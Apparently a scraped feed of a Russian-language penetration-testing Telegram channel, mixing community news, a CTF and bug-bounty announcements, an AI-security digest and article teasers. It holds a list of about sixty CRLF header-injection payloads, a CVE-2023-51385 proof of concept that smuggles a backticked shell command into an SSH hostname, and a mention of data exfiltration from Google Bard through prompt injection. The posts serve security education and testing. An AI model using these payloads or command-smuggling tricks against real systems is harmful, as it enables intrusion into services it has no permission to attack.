Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
Один мой очень хороший знакомый занимается физическим пентестом (сокр. физикой). Мало того, что у него очень интересный бекграунд, так он проворачивает анализы защищенности не хуже, чем в фильмах "Миссия невыполнима". Поэтому особенно советую прочитать его надеюсь последний в этом году, но не последний в будущем физический пентест.
Please open Telegram to view this post
VIEW IN TELEGRAM
Teletype
ВЗЛОМ НА ВЫСОТЕ
Хотелось бы отметить что данный заказчик оказался достаточно крутым, развязал руки на полную имитацию действия APT.
🔥18❤5👍5👎2⚡1
Большое спасибо вам за сами подарки, за душевные и интересные мероприятия в этом году, за прекрасное обновление платформы BI.ZONE BugBounty
И отдельное спасибо ENZO, как от администратора канала, за приятную связь с админами телеграм каналов)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥8🥰3❤2👎2 2❤🔥1
#CTF
Твоя задача состоит из двух частей - сетевых дампов, по которым нужно расследовать происшествие, и ТГ-бота, ссылку на которого нам прислали из будущего. Не бойся сложностей: в решении помогут подсказки из архива воспоминаний потенциального нарушителя. За каждую часть можно получить 50 баллов.
И не забывай: больше - лучше. Зови с собой друзей, мы приветствуем коллаборации и не ограничиваем количество участников от одного учебного заведения или компании.
Присылай свою заявку через платформу онлайн-регистрации.
Еще больше информации - в ТГ-канале соревнований.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👾1
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17 7🤣2❤1 1
Forwarded from Standoff 365
Что:
облачный межсетевой экран уровня веб-приложений PT Cloud Application Firewall
Где:
на Standoff 365 Bug Bounty
Когда:
с 20 декабря 2023 года по 20 января 2024 года
Продукт PT Cloud Application Firewall распространяется по ежемесячной подписке через технологических партнеров — авторизованных сервисных и облачных провайдеров.
По условиям программы, все зарегистрированные на платформе исследователи смогут, используя метод черного ящика, искать уязвимости в ресурсах, которые находятся на домене .ptcloud.ru.
Максимальное вознаграждение за найденные баги: 500 тысяч рублей. А тому, кто первым сдаст критическую уязвимость — мы подарим ящик нашего фирменного пива Блэк Хет.
Итоги багбаунти-программы будут подведены 29 января 2024 года
Please open Telegram to view this post
VIEW IN TELEGRAM
👎4🔥4🤣1
#заметки
make-payloads.sh - replace www.example.com with a specific whitelisted domain in your test casePlease open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - cujanovic/Open-Redirect-Payloads: Open Redirect Payloads
Open Redirect Payloads. Contribute to cujanovic/Open-Redirect-Payloads development by creating an account on GitHub.
Как правило, домен на базе Active Directory обладает значительным количеством объектов, свойств и связей между ними. В общем случае «вручную» выявить недостатки в настройке домена и на их основе построить вероятный вектор атаки является довольно трудоемкой задачей и справится с ней без вспомогательных программных средств не представляется возможным.
В настоящем материале будет представлен обзор некоторых программных средств, использующихся для автоматизированного построения вероятных атак в домене. Кроме того, будут рассмотрены некоторые подходы к улучшению уже имеющихся решений, а также предложен собственный алгоритм к выявлению наиболее приоритетных целей атак.
Please open Telegram to view this post
VIEW IN TELEGRAM
CRLF Injection Payloads
#заметки
🪄 @poxek
#заметки
%0AHeader-Test:POXEK
%0A%20Header-Test:POXEK
%20%0AHeader-Test:POXEK
%23%OAHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
%3F%0AHeader-Test:POXEK
crlf%0AHeader-Test:POXEK
crlf%0A%20Header-Test:POXEK
crlf%20%0AHeader-Test:POXEK
crlf%23%OAHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:POXEK
crlf%3F%0AHeader-Test:POXEK
%0DHeader-Test:POXEK
%0D%20Header-Test:POXEK
%20%0DHeader-Test:POXEK
%23%0DHeader-Test:POXEK
%23%0AHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
%3F%0DHeader-Test:POXEK
crlf%0DHeader-Test:POXEK
crlf%0D%20Header-Test:POXEK
crlf%20%0DHeader-Test:POXEK
crlf%23%0DHeader-Test:POXEK
crlf%23%0AHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:POXEK
crlf%3F%0DHeader-Test:POXEK
%0D%0AHeader-Test:POXEK
%0D%0A%20Header-Test:POXEK
%20%0D%0AHeader-Test:POXEK
%23%0D%0AHeader-Test:POXEK
\r\nHeader-Test:POXEK
\r\n Header-Test:POXEK
\r\n Header-Test:POXEK
%5cr%5cnHeader-Test:POXEK
%E5%98%8A%E5%98%8DHeader-Test:POXEK
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
%3F%0D%0AHeader-Test:POXEK
crlf%0D%0AHeader-Test:POXEK
crlf%0D%0A%20Header-Test:POXEK
crlf%20%0D%0AHeader-Test:POXEK
crlf%23%0D%0AHeader-Test:POXEK
crlf\r\nHeader-Test:POXEK
crlf%5cr%5cnHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8DHeader-Test:POXEK
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:POXEK
crlf%3F%0D%0AHeader-Test:POXEK
%0D%0A%09Header-Test:POXEK
crlf%0D%0A%09Header-Test:POXEK
%250AHeader-Test:POXEK
%25250AHeader-Test:POXEK
%%0A0AHeader-Test:POXEK
%25%30AHeader-Test:POXEK
%25%30%61Header-Test:POXEK
%u000AHeader-Test:POXEK
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:POXEK
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:POXEK
/google.com/%2F..%0D%0AHeader-Test:POXEK
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤2👎1
Forwarded from Пост Лукацкого
Картинка из утренней заметки, а то вдруг вы ее пропустили или посчитали неинтересной аннотацию 😊
Коллекция полезных нагрузок BurpSuite Intruder, полезных нагрузок BurpBounty, списков fuzz листов и методов пентеста. Чтобы собрать все сторонние репозитории, запустите
install.sh в той же директории, где находится папка IntruderPayloads.Please open Telegram to view this post
VIEW IN TELEGRAM
☃7❤2👎1
Forwarded from PWN AI
Вот и первый выпуск дайджеста по безопасности ИИ. Материалы честно позаимствованы с hackstery, что-то дополнено и адаптировано. Но надеюсь, вы поставите
Wunderwuzzi написал статью и выложил PoC для эксфильтрации данных через Google Bard. Он реализовал эксфильтрацию в google docs и обошёл CSP, однако Google уже пофиксили это (((
Layier.AI выпустили свой бенчмарк, в котором при помощи нескольких сканеров промтов оценивается - как тот или иной сканер отработает на Prompt Injection. Среди средств анализа включены следующие инструменты - LLMGuard, Lakera Guard и RebuffAI. Подробнее о том, почему они это сделали – читайте в их статье. Также, они улучшили свою модель Deberta, которая используется для обнаружения Prompt Injection.
Компания Meta* выпустила новые инструменты (Llama Guard и Purple Llama) для защиты входных и выходных данных при взаимодействии с большими языковыми моделями и предложила эталон для оценки рисков кибербезопасности в моделях. (тык, тык и тык)
Huntr написали статью для багхантинга в AI/ML. Часть инструментов вы и сами знаете, а часть была описана в этом канале.
Google выпустил инструмент для подписей моделей через Sigstore. Это фреймворк для обеспечения безопасности цепочки поставок машинного обучения.
Trail Of Bits обнаружили 11 уязвимостей в популярной модели для обнаружения объектов в реальном времени YOLOv7. Snyk уже может сканировать эту модель на уязвимости.
Среди этих уязвимостей есть целых 5 RCE.
Для обнаружения исследователи использовали свой набор правил для semgrep, TorchScript и CodeQl.
Помимо этого, они дали рекомендации по защите модели и уже сообщили разработчикам о данных находках.
Cisco выпустила своего AI-ассистента. Этот инструмент призван помочь безопасникам в настройке и поддержке политик брандмауэра в решениях Cisco. Ранее также Microsoft сделали свой Security Copilot
Кто контролирует OpenAI - статья от Bloomberg
Заменит ли ИИ безопасника
Жду ваших репостов и комментариев на этот счёт
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👎1😈1 1
Что такое фишинг, знает и стар и млад, но пользователи все равно продолжают попадаться на уловки злоумышленников. В этой статье мы рассмотрим фишинговые ссылки, а точнее, способы их маскировки с использованием официальных сайтов известных компаний и сервисов.
Открытым редиректом в «1С‑Битрикс» уже никого не удивишь. Давай лучше рассмотрим, как киберпреступники умудряются использовать archive.org, evernote.com, bing.com, microsoft.com, adobe.com и другие трастовые домены для того, чтобы обмануть доверчивых пользователей.
Please open Telegram to view this post
VIEW IN TELEGRAM
☃5🎄1 1
По статистике значительная часть заражений малварью происходит из‑за того, что пользователь сам запустил на своей машине вредоносный файл. Именно в этом и заключается основная задача злоумышленников, использующих социальную инженерию. Давай посмотрим, какие технические уловки и хитрости они применяют.
Мы рассмотрим атаки с файлами не с точки зрения того, как их доставляют во время пентеста и что в них пишут, чтобы пользователь повелся. Об этом мы поговорим в другой раз. Сегодня мы коснемся нескольких технических аспектов, включая маскировку файлов и расширений, и обсудим некоторые лайфхаки.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8 2
#лаба
Спонтанный пост для тех, кто ищет чем заняться на выходных)
Полезная головоломка для начинающих специалистов и "повторение - мать учения" для прожжённых самоварчиков.
Смысл сей авантюры в том, что вы с 0 до 34 уровня должны подключаться по ssh к следующему уровню. А как это сделать вам и придется выяснить :))
Эта игра будет полезна в первую очередь для начинающих в освоении Linux на базовом уровне и по ходу решения уровней, сможете постигать тонкости нативных утилит.
ssh bandit0@bandit.labs.overthewire.org -p 2220Please open Telegram to view this post
VIEW IN TELEGRAM
SSH ProxyCommand == RCE
CVE-2023-51385
#RCE
SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like
When coming from untrusted sources, a hostname can be malicious and look something like
Malicious config:
Latest PoC:
Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2
For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8
🌚 @poxek
CVE-2023-51385
#RCE
SSH’s ProxyCommand is a feature quite widely used to proxy ssh connections by allowing to specify custom commands to be used to connect to the server. Arguments to this directive may contain tokens like
%h, %u which refer to hostname and username respectively.When coming from untrusted sources, a hostname can be malicious and look something like
malicious-command (backticks would allow a command to be executed in shell)Malicious config:
Host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Latest PoC:
url = ssh://'`open -aCalculator`'foo.example.com/bar
Exploit: https://github.com/vin01/poc-proxycommand-vulnerable-v2
For Remediation you need update to:
OpenSSH 9.6p1
libssh 0.10.6 and 0.9.8
Please open Telegram to view this post
VIEW IN TELEGRAM
👎10 8❤3 3
Forwarded from AKTIV.CONSULTING
Ведущие Анастасия Харыбина, Тимофей Матреницкий и приглашенный эксперт Алексей Петухов обсудили одну из самых актуальных тем для многих компаний — проблему кадрового голода
Участники подкаста рассмотрели:
Смотрите и слушайте, где вам будет удобно:
Приятного просмотра
#подкаст
Please open Telegram to view this post
VIEW IN TELEGRAM